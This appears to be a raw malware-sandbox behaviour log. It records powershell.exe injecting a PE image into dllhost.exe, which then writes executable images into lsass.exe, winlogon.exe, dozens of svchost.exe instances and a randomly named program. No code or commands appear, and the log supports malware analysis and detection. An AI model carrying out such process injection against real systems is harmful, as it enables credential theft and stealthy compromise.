Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 11825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A6B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B0A02EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: DFF92EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27325AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEE30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C95C650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FB7A020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 143A2940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: D00000 value starts with: 4D5A
